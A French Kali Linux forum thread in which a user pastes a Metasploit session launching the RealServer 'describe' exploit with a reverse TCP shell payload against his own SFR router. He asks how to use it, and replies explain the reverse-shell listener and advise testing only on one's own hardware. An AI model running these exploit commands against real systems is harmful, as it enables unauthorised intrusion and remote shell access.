Auteur Sujet: [réglé] armitage EXPLOIT SFR box  (Lu 5528 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne bqss

  • Nouvel inscrit
  • Messages: 2
  • +1/-0
[réglé] armitage EXPLOIT SFR box
« le: 18 janvier 2014 à 00:15:15 »
bonjour, donc voila en essayant de scanner mon reseau avec armitage donc y compris ma sfr box, et apres moulte scan, armitage me trouve un exploit "describe" ->realserver .... il me créé donc un handler ( j'ai coché, "reverse connection" ),

msf> use exploit/multi/realserver/describe
msf exploit(describe) > set LHOST 192.168.1.79
LHOST => 192.168.1.79
msf exploit(describe) > set RPORT 80
RPORT => 80
msf exploit(describe) > set LPORT 4176
LPORT => 4176
msf exploit(describe) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(describe) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(describe) > set TARGET 0
TARGET => 0
msf exploit(describe) > exploit -j
  • Exploit running as background job.
  • Started reverse handler on 192.168.1.79:4176
  • RealServer universal exploit launched against 192.168.1.1
  • Kill the master rmserver pid to prevent shell disconnect


Ma question: comment faire pour utiliser cette exploit ? et est ce dangereux ?

merci
« Modifié: 25 janvier 2014 à 14:40:21 par admin »

Hors ligne TPB01

  • Membre Junior
  • *
  • Messages: 26
  • +1/-1
Re : armitage EXPLOIT SFR box
« Réponse #1 le: 18 janvier 2014 à 01:52:40 »
Ma question: comment faire pour utiliser cette exploit ?
beuuuuuuu en l'utilisant  ;) Tu l'as bien lancé non ? Qu'elle résultat as tu eu ? Et puis les exploits ne réussissent pas toujours à 100% même quand on ne voit aucun n'obstacle.
Citer
  et est ce dangereux ?
J'crois que le seul vrai moyen de le savoir est de l'essayer. Qui ne risque rien n'a rien  ;D

Hors ligne admin

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 1711
  • +74/-3
    • Communauté FR de Kali-linux
Re : armitage EXPLOIT SFR box
« Réponse #2 le: 19 janvier 2014 à 17:14:17 »
L'utilisation d'un exploit est toujours "dangereux" c'est pourquoi il vaut mieux tester ce que l'on fait sur du matériel nous appartenant. Au pire tu risques de "casser" la box.

Pour utiliser l'exploit, si le payload s’exécute correctement sur le box, il te faut mettre un port en écoute sur ta machine afin de réceptionner la trame envoyée par la box puis utiliser le canal de communication créé par le "reverse shell".

Tiens nous informé

Hors ligne bqss

  • Nouvel inscrit
  • Messages: 2
  • +1/-0
Re : [en cours] armitage EXPLOIT SFR box
« Réponse #3 le: 25 janvier 2014 à 13:00:49 »
re bonjour, j'ai biensur effectué ce test sur ma propre box ;)
De peur de ruiner ma box j'ai preferé ne pas aller plus loin :)
merci tout de même ! :D
bonne journée

Hors ligne admin

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 1711
  • +74/-3
    • Communauté FR de Kali-linux
Re : [en cours] armitage EXPLOIT SFR box
« Réponse #4 le: 25 janvier 2014 à 14:40:11 »
Ok, merci  du retour  8)